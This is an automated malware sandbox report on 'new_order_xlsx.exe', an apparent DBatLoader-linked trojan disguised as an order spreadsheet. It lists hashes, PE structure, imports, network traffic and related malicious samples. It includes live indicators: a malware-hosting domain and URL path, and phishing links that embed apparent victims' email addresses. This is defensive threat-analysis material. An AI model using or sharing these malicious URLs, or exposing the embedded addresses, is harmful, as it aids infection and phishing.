                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    185.181.116.217
                    		balkancelikdovme.comUnited Kingdom
                    		29017GYRONGBtrue

                    General Information

                    Joe Sandbox Version:38.0.0 Beryl
                    Analysis ID:1303012
                    Start date and time:2023-09-04 16:34:53 +02:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 11m 11s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Run name:Run with higher sleep bypass
                    Number of analysed new started processes analysed:22
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample file name:new_order_xlsx.exe
                    Detection:MAL
                    Classification:mal92.troj.winEXE@1/0@18/1
                    EGA Information:Failed
                    HDC Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 2
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): kv601.prod.do.dsp.mp.microsoft.com, ris.api.iris.microsoft.com, fs.microsoft.com, geo.prod.do.dsp.mp.microsoft.com, eudb.ris.api.iris.microsoft.com, tse1.mm.bing.net, arc.msn.com
                    • Execution Graph export aborted for target new_order_xlsx.exe, PID 6804 because there are no executed function
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtOpenFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: new_order_xlsx.exe

                    Simulations

                    Behavior and APIs

                    No simulations

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    185.181.116.217r096teIe1H.exeGet hashmaliciousDBatLoaderBrowse
                    • balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk
                    r096teIe1H.exeGet hashmaliciousDBatLoaderBrowse
                    • balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk

                    Domains

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    balkancelikdovme.comr096teIe1H.exeGet hashmaliciousDBatLoaderBrowse
                    • 185.181.116.217
                    r096teIe1H.exeGet hashmaliciousDBatLoaderBrowse
                    • 185.181.116.217
                    0vJrK0NCd1.exeGet hashmaliciousRemcos, DBatLoader, FloodFixBrowse
                    • 185.181.116.217

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    GYRONGBr096teIe1H.exeGet hashmaliciousDBatLoaderBrowse
                    • 185.181.116.217
                    r096teIe1H.exeGet hashmaliciousDBatLoaderBrowse
                    • 185.181.116.217
                    0vJrK0NCd1.exeGet hashmaliciousRemcos, DBatLoader, FloodFixBrowse
                    • 185.181.116.217
                    CX17SY6xF6.exeGet hashmaliciousPushdoBrowse
                    • 83.223.113.46
                    PIyT9A3jfC.exeGet hashmaliciousPushdoBrowse
                    • 83.223.113.46
                    nhVJ8J5qOt.exeGet hashmaliciousPushdoBrowse
                    • 83.223.113.46
                    fs7AQcREFX.exeGet hashmaliciousPushdoBrowse
                    • 83.223.113.46
                    https://farma-net.com/admin/auth?userid=rob.mayberry@gelita.comGet hashmaliciousHTMLPhisherBrowse
                    • 89.145.93.101
                    IrJyqwDp6P.elfGet hashmaliciousMirai, MoobotBrowse
                    • 83.223.101.7
                    6gjnnBAbpc.exeGet hashmaliciousPushdoBrowse
                    • 83.223.113.46
                    sora.arm7.elfGet hashmaliciousMiraiBrowse
                    • 83.223.101.9
                    iJzpyjAehB.exeGet hashmaliciousPushdoBrowse
                    • 83.223.113.46
                    EksRd2mRLH.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                    • 83.223.113.46
                    rLDmqbpt5D.exeGet hashmaliciousPushdo, DanaBot, RedLine, SmokeLoaderBrowse
                    • 83.223.113.46
                    irLUxBeO3j.elfGet hashmaliciousMiraiBrowse
                    • 212.113.144.7
                    d4bNCWDk1F.exeGet hashmaliciousPushdoBrowse
                    • 83.223.113.46
                    file.exeGet hashmaliciousPushdo, DanaBot, SmokeLoaderBrowse
                    • 83.223.113.46
                    https://s3.amazonaws.com/appforest_uf/f1673569031431x837044964462498200/index.xhtml?17373464282007070576159867576718836072896596236213191414781774633016138409263067560810655664611593768691127511520387902715816470054901430985217113983744921341215241681383688426527535794966000143072299496022028714025186539246245021092115024781420437166872573917715270671544911886953886795996849529998276450=!!ERROR%20IN%20FUNCTION%20PARAMETERS!!%20'boyd.eastman@imail.org'%20ist%20kein%20g%C3%BCltiger%20Integerwert&1765620972=Ym95ZC5lYXN0bWFuQGltYWlsLm9yZw==&1/16/202318961133127049864077866167768198212901460441750214020786111898549251534145544273852461499171043240208500698254918200574448252831614537487276212299050019524818481725182239195411702340331216281502686321309755971688813861&email=boyd.eastman@imail.org&2048532416162595706016219186831446773579524518014200612466611761644571231872529944108636910539217157238248758958712136946159490521927112180269811067101566160108479243853193319321023555707545963759105821172180882197934179314148125212682089161392996891286741775134210235114693034421458487518136059350121079991895186634721265116660=138892235Get hashmaliciousHTMLPhisherBrowse
                    • 83.223.113.113
                    1EsDtA4mep.exeGet hashmaliciousPushdoBrowse
                    • 83.223.113.46

                    JA3 Fingerprints

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    ce5f3254611a8c095a3d821d44539877file.exeGet hashmaliciousSmokeLoaderBrowse
                    • 185.181.116.217
                    cv4TCGxUjvS.exeGet hashmaliciousKnightCryptBrowse
                    • 185.181.116.217
                    8_0.exeGet hashmaliciousKnightCryptBrowse
                    • 185.181.116.217
                    cv4TCGxUjvS.exeGet hashmaliciousUnknownBrowse
                    • 185.181.116.217
                    8_0.exeGet hashmaliciousUnknownBrowse
                    • 185.181.116.217
                    HhcSy5LcAb.exeGet hashmaliciousVidar, onlyLoggerBrowse
                    • 185.181.116.217
                    dbnXGwXFlH.exeGet hashmaliciousVidar, onlyLoggerBrowse
                    • 185.181.116.217
                    mh3J5rNiL7.exeGet hashmaliciousLummaC StealerBrowse
                    • 185.181.116.217
                    hXc1HKdJz9.exeGet hashmaliciousLummaC StealerBrowse
                    • 185.181.116.217
                    file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                    • 185.181.116.217
                    file.exeGet hashmaliciousSmokeLoaderBrowse
                    • 185.181.116.217
                    dhvJVmmIiU.exeGet hashmaliciousSmokeLoaderBrowse
                    • 185.181.116.217
                    NLbhtKL2l6.exeGet hashmaliciousSmokeLoaderBrowse
                    • 185.181.116.217
                    FXpqBlJk7x.exeGet hashmaliciousVidar, onlyLoggerBrowse
                    • 185.181.116.217
                    file.exeGet hashmaliciousSmokeLoaderBrowse
                    • 185.181.116.217
                    92.exeGet hashmaliciousKnightCryptBrowse
                    • 185.181.116.217
                    12.exeGet hashmaliciousKnightCryptBrowse
                    • 185.181.116.217
                    12.exeGet hashmaliciousUnknownBrowse
                    • 185.181.116.217
                    92.exeGet hashmaliciousUnknownBrowse
                    • 185.181.116.217

                    Dropped Files

                    No context

                    Created / dropped Files

                    No created / dropped files found

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.588119453866235
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.66%
                    • Win32 Executable Delphi generic (14689/80) 0.15%
                    • Windows Screen Saver (13104/52) 0.13%
                    • Win16/32 Executable Delphi generic (2074/23) 0.02%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    File name:new_order_xlsx.exe
                    File size:1'516'544 bytes
                    MD5:ef6025979e7e27041ef72650fdbe8630
                    SHA1:8ac15cf845249b2a7c9c095808153656579b1704
                    SHA256:5c8d558572c445f5fdadc3758c208654d7dd2787a73a2a1e1757e87dd19d6fad
                    SHA512:366a49d28744c8608e752eacf277beb3277864bf750068b181f1bacc162ad3851c39a99c4b19974c5689aa11c75f1226f01ad348b8bac28b9e17e404e6c85367
                    SSDEEP:24576:/UWyWyLFqghcA0n9WUS20tFJTtf7BtdZhPKRZUW0YEq0UxX8OCTL5GJ:/UWX7WUktFJT5BtdZpWWqxxX8O0L5W
                    TLSH:CA65D055F2534473D1677930C8AB9396D8A8BE702E2CA50EAAE03F58CF363C57835276
                    File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                    File Icon

                    Icon Hash:71f9919286b2a1a5

                    Static PE Info

                    General

                    Entrypoint:0x47544c
                    Entrypoint Section:CODE
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    DLL Characteristics:
                    Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:555fbb180099f7ea0a0860999295d5a4

                    Entrypoint Preview

                    Instruction
                    push ebp
                    mov ebp, esp
                    add esp, FFFFFFF0h
                    mov eax, 004751D4h
                    call 00007F4B20B57729h
                    mov eax, dword ptr [00549C30h]
                    mov eax, dword ptr [eax]
                    call 00007F4B20BA5049h
                    mov eax, dword ptr [00549C30h]
                    mov eax, dword ptr [eax]
                    mov edx, 004754ACh
                    call 00007F4B20BA4C38h
                    mov ecx, dword ptr [005499F4h]
                    mov eax, dword ptr [00549C30h]
                    mov eax, dword ptr [eax]
                    mov edx, dword ptr [00474FA8h]
                    call 00007F4B20BA5038h
                    mov eax, dword ptr [00549C30h]
                    mov eax, dword ptr [eax]
                    call 00007F4B20BA50ACh
                    call 00007F4B20B552DFh
                    add byte ptr [eax], al

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x14b0000x234c.idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1580000x20400.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1500000x7148.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x14f0000x18.rdata
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    CODE0x10000x744b80x74600False0.526922076396348data6.571041625499515IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    DATA0x760000xd3dc80xd3e00False0.8124792588495575data7.77931741120788IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    BSS0x14a0000xd010x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .idata0x14b0000x234c0x2400False0.3607855902777778data4.979560631692908IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .tls0x14e0000x100x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rdata0x14f0000x180x200False0.05078125data0.2069200177871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                    .reloc0x1500000x71480x7200False0.6496367872807017data6.698392964417246IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                    .rsrc0x1580000x204000x20400False0.7290531128875969data6.955198009447542IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                    Resources

                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_CURSOR0x158b480x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                    RT_CURSOR0x158c7c0x134data0.4642857142857143
                    RT_CURSOR0x158db00x134data0.4805194805194805
                    RT_CURSOR0x158ee40x134data0.38311688311688313
                    RT_CURSOR0x1590180x134data0.36038961038961037
                    RT_CURSOR0x15914c0x134data0.4090909090909091
                    RT_CURSOR0x1592800x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                    RT_BITMAP0x1593b40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                    RT_BITMAP0x1595840x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 3800.46487603305785125
                    RT_BITMAP0x1597680x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                    RT_BITMAP0x1599380x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39870689655172414
                    RT_BITMAP0x159b080x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.4245689655172414
                    RT_BITMAP0x159cd80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5021551724137931
                    RT_BITMAP0x159ea80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5064655172413793
                    RT_BITMAP0x15a0780x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                    RT_BITMAP0x15a2480x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5344827586206896
                    RT_BITMAP0x15a4180x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                    RT_BITMAP0x15a5e80xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                    RT_ICON0x15a6d00x1a68Device independent bitmap graphic, 40 x 80 x 32, image size 67200.09186390532544379
                    RT_DIALOG0x15c1380x52data0.7682926829268293
                    RT_STRING0x15c18c0xa4data0.5914634146341463
                    RT_STRING0x15c2300x31cdata0.45979899497487436
                    RT_STRING0x15c54c0x1dcdata0.3592436974789916
                    RT_STRING0x15c7280x154data0.5470588235294118
                    RT_STRING0x15c87c0x240data0.4565972222222222
                    RT_STRING0x15cabc0x184data0.5489690721649485
                    RT_STRING0x15cc400xe8data0.5991379310344828
                    RT_STRING0x15cd280x138data0.5512820512820513
                    RT_STRING0x15ce600x3ecdata0.40239043824701193
                    RT_STRING0x15d24c0x390data0.37390350877192985
                    RT_STRING0x15d5dc0x3a4data0.34763948497854075
                    RT_STRING0x15d9800x3e8data0.384
                    RT_STRING0x15dd680xf4data0.47540983606557374
                    RT_STRING0x15de5c0xc4data0.5663265306122449
                    RT_STRING0x15df200x2c0data0.4446022727272727
                    RT_STRING0x15e1e00x478data0.2928321678321678
                    RT_STRING0x15e6580x3acdata0.37553191489361704
                    RT_STRING0x15ea040x2d4data0.4046961325966851
                    RT_RCDATA0x15ecd80x10data1.5
                    RT_RCDATA0x15ece80x30cdata0.7153846153846154
                    RT_RCDATA0x15eff40x18fe6Delphi compiled form 'TGoFrm'0.8656983218395295
                    RT_GROUP_CURSOR0x177fdc0x14Lotus unknown worksheet or configuration, revision 0x11.25
                    RT_GROUP_CURSOR0x177ff00x14Lotus unknown worksheet or configuration, revision 0x11.25
                    RT_GROUP_CURSOR0x1780040x14Lotus unknown worksheet or configuration, revision 0x11.3
                    RT_GROUP_CURSOR0x1780180x14Lotus unknown worksheet or configuration, revision 0x11.3
                    RT_GROUP_CURSOR0x17802c0x14Lotus unknown worksheet or configuration, revision 0x11.3
                    RT_GROUP_CURSOR0x1780400x14Lotus unknown worksheet or configuration, revision 0x11.3
                    RT_GROUP_CURSOR0x1780540x14Lotus unknown worksheet or configuration, revision 0x11.3
                    RT_GROUP_ICON0x1780680x14data1.25
                    RT_MANIFEST0x17807c0x2f0XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5199468085106383

                    Imports

                    DLLImport
                    kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                    user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                    advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                    oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                    kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                    advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                    kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, ExitProcess, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                    version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                    gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                    user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursorInfo, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                    kernel32.dllSleep
                    oleaut32.dllSafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                    ole32.dllCoUninitialize, CoInitialize
                    oleaut32.dllGetErrorInfo, SysFreeString
                    comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                    ntdllNtWriteVirtualMemory, NtProtectVirtualMemory
                    uRLTelnetProtocolHandler

                    Possible Origin

                    Language of compilation systemCountry where language is spokenMap
                    EnglishUnited States

                    Network Behavior

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Sep 4, 2023 16:36:09.172120094 CEST49701443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:09.172183037 CEST44349701185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:09.172259092 CEST49701443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:09.177002907 CEST49701443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:09.177031994 CEST44349701185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:09.266730070 CEST44349701185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:09.266882896 CEST49701443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:09.272043943 CEST49701443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:09.272072077 CEST44349701185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:09.272682905 CEST44349701185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:09.312979937 CEST49701443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:09.516974926 CEST49701443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:09.551485062 CEST44349701185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:09.551615953 CEST44349701185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:09.551747084 CEST49701443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:09.553774118 CEST49701443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:09.553802967 CEST44349701185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:18.988594055 CEST49706443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:18.988672018 CEST44349706185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:18.988780975 CEST49706443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:18.989620924 CEST49706443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:18.989656925 CEST44349706185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:19.069029093 CEST44349706185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:19.069140911 CEST49706443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:19.071770906 CEST49706443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:19.071830034 CEST44349706185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:19.072247028 CEST44349706185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:19.074871063 CEST49706443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:19.115502119 CEST44349706185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:19.172960043 CEST44349706185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:19.173058987 CEST44349706185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:19.173191071 CEST49706443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:19.173578024 CEST49706443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:19.173608065 CEST44349706185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:19.173635006 CEST49706443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:19.173643112 CEST44349706185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:28.942027092 CEST49723443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:28.942106009 CEST44349723185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:28.942203045 CEST49723443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:28.942892075 CEST49723443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:28.942914963 CEST44349723185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:29.028635979 CEST44349723185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:29.028776884 CEST49723443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:29.031045914 CEST49723443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:29.031091928 CEST44349723185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:29.031459093 CEST44349723185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:29.033216000 CEST49723443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:29.075495005 CEST44349723185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:29.127738953 CEST44349723185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:29.127914906 CEST44349723185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:29.128062010 CEST49723443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:29.128381968 CEST49723443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:29.128416061 CEST44349723185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:29.128458023 CEST49723443192.168.2.4185.181.116.217
                    Sep 4, 2023 16:36:29.128470898 CEST44349723185.181.116.217192.168.2.4
                    Sep 4, 2023 16:36:38.920041084 CEST49724443192.168.2.4185.181.116.217
